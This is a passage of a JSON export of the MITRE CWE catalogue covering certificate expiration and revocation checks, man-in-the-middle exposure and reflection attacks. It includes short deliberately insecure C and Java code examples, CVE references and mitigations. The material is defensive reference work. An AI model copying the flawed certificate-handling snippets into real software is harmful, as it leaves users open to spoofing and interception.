hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5822"},{"Reference":"CVE-2012-5819","Description":"Cloud storage management application does not validate hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5819"},{"Reference":"CVE-2012-5817","Description":"Java library uses JSSE SSLSocket and SSLEngine classes, which do not verify the hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5817"},{"Reference":"CVE-2012-5784","Description":"SOAP platform does not verify the hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5784"},{"Reference":"CVE-2012-5782","Description":"PHP library for payments does not verify the hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5782"},{"Reference":"CVE-2012-5780","Description":"Merchant SDK for payments does not verify the hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5780"},{"Reference":"CVE-2003-0355","Description":"Web browser does not validate Common Name, allowing spoofing of https sites.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0355"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to validate host-specific certificate data"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-245"}},{"attr":{"@_External_Reference_ID":"REF-243"}},{"attr":{"@_External_Reference_ID":"REF-249"}},{"attr":{"@_External_Reference_ID":"REF-250"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 23: Improper Use of PKI, Especially SSL." Page 347"}},{"attr":{"@_External_Reference_ID":"REF-955"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-01-16","Modification_Comment":"Integrated mitigations and detection methods for Certificate Pinning based on feedback from the CWE Researcher List in December 2017."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Common_Consequences, Description, Detection_Factors, Modes_of_Introduction, Potential_Mitigations, References, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, References, Relationships"}],"Previous_Entry_Name":[{"#text":"Failure to Validate Host-specific Certificate Data","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Validation of Host-specific Certificate Data","attr":{"@_Date":"2013-02-21"}}]}},"298":{"attr":{"@_ID":"298","@_Name":"Improper Validation of Certificate Expiration","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A certificate expiration is not validated or is incorrectly validated, so trust may be assigned to certificates that have been abandoned due to age.","Extended_Description":"When the expiration of a certificate is not taken into account, no trust has necessarily been conveyed through it. Therefore, the validity of the certificate cannot be verified and all benefit of the certificate is lost.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"295","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Implementation","Note":"When the software uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete."}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Other"],"Impact":"Other","Note":"The data read from the system vouched for by the expired certificate may be flawed due to malicious spoofing."},{"Scope":["Authentication","Other"],"Impact":"Other","Note":"Trust afforded to the system in question - based on the expired certificate - may allow for spoofing attacks."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Check for expired certificates and provide the user with adequate information about the nature of the problem and how to proceed."},{"Phase":"Implementation","Description":"If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the expiration."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-123"},"Intro_Text":"The following OpenSSL code ensures that there is a certificate and allows the use of expired certificates.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer(certificate(ssl)) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"foo=SSL_get_verify_result(ssl);if ((X509_V_OK==foo) || (X509_V_ERR_CERT_HAS_EXPIRED==foo))","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"//do stuff"}}}}}},"Body_Text":"If the call to SSL_get_verify_result() returns X509_V_ERR_CERT_HAS_EXPIRED, this means that the certificate has expired. As time goes on, there is an increasing chance for attackers to compromise the certificate."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to validate certificate expiration"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 23: Improper Use of PKI, Especially SSL." Page 347"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Common_Consequences, Modes_of_Introduction, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Failure to Validate Certificate Expiration","attr":{"@_Date":"2009-03-10"}}}},"299":{"attr":{"@_ID":"299","@_Name":"Improper Check for Certificate Revocation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not check or incorrectly checks the revocation status of a certificate, which may cause it to use a certificate that has been compromised.","Extended_Description":"An improper check for certificate revocation is a far more serious flaw than related certificate failures. This is because the use of any revoked certificate is almost certainly malicious. The most common reason for certificate revocation is compromise of the system in question, with the result that no legitimate servers will be using a revoked certificate, unless they are sorely out of sync.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"295","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Implementation","Note":"When the software uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Trust may be assigned to an entity who is not who it claims to be."},{"Scope":["Integrity","Other"],"Impact":"Other","Note":"Data from an untrusted (and possibly malicious) source may be integrated."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Data may be disclosed to an entity impersonating a trusted entity, resulting in information disclosure."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Ensure that certificates are checked for revoked status."},{"Phase":"Implementation","Description":"If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the revoked status."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-124"},"Intro_Text":"The following OpenSSL code ensures that there is a certificate before continuing execution.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer_certificate(ssl)) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// got a certificate, do secret things"}}}},"Body_Text":"Because this code does not use SSL_get_verify_results() to check the certificate, it could accept certificates that have been revoked (X509_V_ERR_CERT_REVOKED). The software could be communicating with a malicious host."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2011-2014","Description":"LDAP-over-SSL implementation does not check Certificate Revocation List (CRL), allowing spoofing using a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2014"},{"Reference":"CVE-2011-0199","Description":"Operating system does not check Certificate Revocation List (CRL) in some cases, allowing spoofing using a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0199"},{"Reference":"CVE-2010-5185","Description":"Antivirus product does not check whether certificates from signed executables have been revoked.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5185"},{"Reference":"CVE-2009-3046","Description":"Web browser does not check if any intermediate certificates are revoked.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3046"},{"Reference":"CVE-2009-0161","Description":"chain: Ruby module for OCSP misinterprets a response, preventing detection of a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0161"},{"Reference":"CVE-2011-2701","Description":"chain: incorrect parsing of replies from OCSP responders allows bypass using a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2701"},{"Reference":"CVE-2011-0935","Description":"Router can permanently cache certain public keys, which would allow bypass if the certificate is later revoked.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0935"},{"Reference":"CVE-2009-1358","Description":"chain: OS package manager does not properly check the return value, allowing bypass using a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1358"},{"Reference":"CVE-2009-0642","Description":"chain: language interpreter does not properly check the return value from an OSCP function, allowing bypass using a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0642"},{"Reference":"CVE-2008-4679","Description":"chain: web service component does not call the expected method, which prevents a check for revoked certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4679"},{"Reference":"CVE-2006-4410","Description":"Certificate revocation list not searched for certain certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4410"},{"Reference":"CVE-2006-4409","Description":"Product cannot access certificate revocation list when an HTTP proxy is being used.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4409"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to check for certificate revocation"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 23: Improper Use of PKI, Especially SSL." Page 347"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Observed_Examples, Other_Notes, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Modes_of_Introduction, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Failure to Check for Certificate Revocation","attr":{"@_Date":"2009-03-10"}}}},"300":{"attr":{"@_ID":"300","@_Name":"Channel Accessible by Non-Endpoint","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not adequately verify the identity of actors at both ends of a communication channel, or does not adequately ensure the integrity of the channel, in a way that allows the channel to be accessed or influenced by an actor that is not an endpoint.","Extended_Description":"In order to establish secure communication between two parties, it is often important to adequately verify the identity of entities at each end of the communication channel. Inadequate or inconsistent verification may result in insufficient or incorrect identification of either communicating entity. This can have negative consequences such as misplaced trust in the entity at the other end of the channel. An attacker can leverage this by interposing between the communicating entities and masquerading as the original entity. In the absence of sufficient verification of identity, such an attacker can eavesdrop and potentially modify the communication between the original entities.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Adversary-in-the-Middle / AITM"},{"Term":"Man-in-the-Middle / MITM"},{"Term":"Person-in-the-Middle / PITM"},{"Term":"Monkey-in-the-Middle"},{"Term":"Monster-in-the-Middle"},{"Term":"On-path attack"},{"Term":"Interception attack"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":["Read Application Data","Modify Application Data","Gain Privileges or Assume Identity"],"Note":"An attacker could pose as one of the entities and read or possibly modify the communication."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Always fully authenticate both ends of any communications channel."},{"Phase":"Architecture and Design","Description":"Adhere to the principle of complete mediation."},{"Phase":"Implementation","Description":"A certificate binds an identity to a cryptographic key to authenticate a communicating party. Often, the certificate takes the encrypted form of the hash of the identity of the subject, the public key, and information such as time of issue or expiration using the issuer\'s private key. The certificate can be validated by deciphering the certificate with the issuer\'s public key. See also X.509 certificate signature chains and the PGP certification structure."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the Java snippet below, data is sent over an unencrypted channel to a remote server.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Socket sock;PrintWriter out;try {}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"sock = new Socket(REMOTE_HOST, REMOTE_PORT);out = new PrintWriter(echoSocket.getOutputStream(), true);...","xhtml:br":["","","",""],"xhtml:i":"// Write data to remote host via socket output stream."}}}},"Body_Text":"By eavesdropping on the communication channel or posing as the endpoint, an attacker would be able to read all of the transmitted data."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2014-1266","Description":"chain: incorrect \\"goto\\" in Apple SSL product bypasses certificate validation, allowing Adversry-in-the-Middle (AITM) attack (Apple \\"goto fail\\" bug). CWE-705 (Incorrect Control Flow Scoping) -> CWE-561 (Dead Code) -> CWE-295 (Improper Certificate Validation) -> CWE-393 (Return of Wrong Status Code) -> CWE-300 (Channel Accessible by Non-Endpoint).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Man-in-the-middle (MITM)"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":32,"Entry_Name":"Routing Detour"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC06-J","Entry_Name":"Do not rely on the default automatic signature verification provided by URLClassLoader and java.util.jar"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"466"}},{"attr":{"@_CAPEC_ID":"57"}},{"attr":{"@_CAPEC_ID":"589"}},{"attr":{"@_CAPEC_ID":"590"}},{"attr":{"@_CAPEC_ID":"612"}},{"attr":{"@_CAPEC_ID":"613"}},{"attr":{"@_CAPEC_ID":"615"}},{"attr":{"@_CAPEC_ID":"662"}},{"attr":{"@_CAPEC_ID":"94"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-244"}}},"Notes":{"Note":{"#text":"The summary identifies multiple distinct possibilities, suggesting that this is a category that must be broken into more specific weaknesses.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Alternate_Terms, Name, Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Alternate_Terms, Observed_Examples"}],"Previous_Entry_Name":[{"#text":"Man-in-the-middle (MITM)","attr":{"@_Date":"2008-04-11"}},{"#text":"Channel Accessible by Non-Endpoint (aka \'Man-in-the-Middle\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Channel Accessible by Non-Endpoint (\'Man-in-the-Middle\')","attr":{"@_Date":"2020-02-24"}}]}},"301":{"attr":{"@_ID":"301","@_Name":"Reflection Attack in an Authentication Protocol","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Simple authentication protocols are subject to reflection attacks if a malicious user can use the target machine to impersonate a trusted user.","Extended_Description":{"xhtml:p":["A mutual authentication protocol requires each party to respond to a random challenge by the other party by encrypting it with a pre-shared key. Often, however, such protocols employ the same pre-shared key for communication with a number of different entities. A malicious user or an attacker can easily compromise this protocol without possessing the correct key by employing a reflection attack on the protocol.","Reflection attacks capitalize on mutual authentication schemes in order to trick the target into revealing the secret shared between it and another valid user. In a basic mutual-authentication scheme, a secret is known to both the valid user and the server; this allows them to authenticate. In order that they may verify this shared secret without sending it plainly over the wire, they utilize a Diffie-Hellman-style scheme in which they each pick a value, then request the hash of that value as keyed by the shared secret. In a reflection attack, the attacker claims to be a valid user and requests the hash of a random value from the server. When the server returns this value and requests its own value to be hashed, the attacker opens another connection to the server. This time, the hash requested by the attacker is the value which the server requested in the first connection. When the server returns this hashed value, it is used in the first connection, authenticating the attacker successfully as the impersonated valid user."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"327","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"The primary result of reflection attacks is successful authentication with a target machine -- as an impersonated user."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use different keys for the initiator and responder or of a different type of challenge for the initiator and responder."},{"Phase":"Architecture and Design","Description":"Let the initiator prove its identity before proceeding."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned char *simple_digest(char *alg,char *buf,unsigned int len, int *olen) {}unsigned char *generate_password_and_cmd(char *password_and_cmd) {}","xhtml:div":[{"#text":"const EVP_MD *m;EVP_MD_CTX ctx;unsigned char *ret;OpenSSL_add_all_digests();if (!(m = EVP_get_digestbyname(alg))) return NULL;if (!(ret = (unsigned char*)malloc(EVP_MAX_MD_SIZE))) return NULL;EVP_DigestInit(&ctx, m);EVP_DigestUpdate(&ctx,buf,len);EVP_DigestFinal(&ctx,ret,olen);return ret;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","",""]},{"#text":"simple_digest(\\"sha1\\",password,strlen(password_and_cmd)...);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String command = new String(\\"some cmd to execute & the password\\") MessageDigest encer = MessageDigest.getInstance(\\"SHA\\");encer.update(command.getBytes(\\"UTF-8\\"));byte[] digest = encer.digest();","xhtml:br":["",""]}}]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-3435","Description":"product authentication succeeds if user-provided MD5 hash matches the hash in its database; this can be subjected to replay attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3435"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Reflection attack in an auth protocol"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A7","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"90"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, "Insufficient Validation", Page 38"}}]},"Notes":{"Note":{"#text":"The term \\"reflection\\" is used in multiple ways within CWE and the community, so its usage should be reviewed.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content 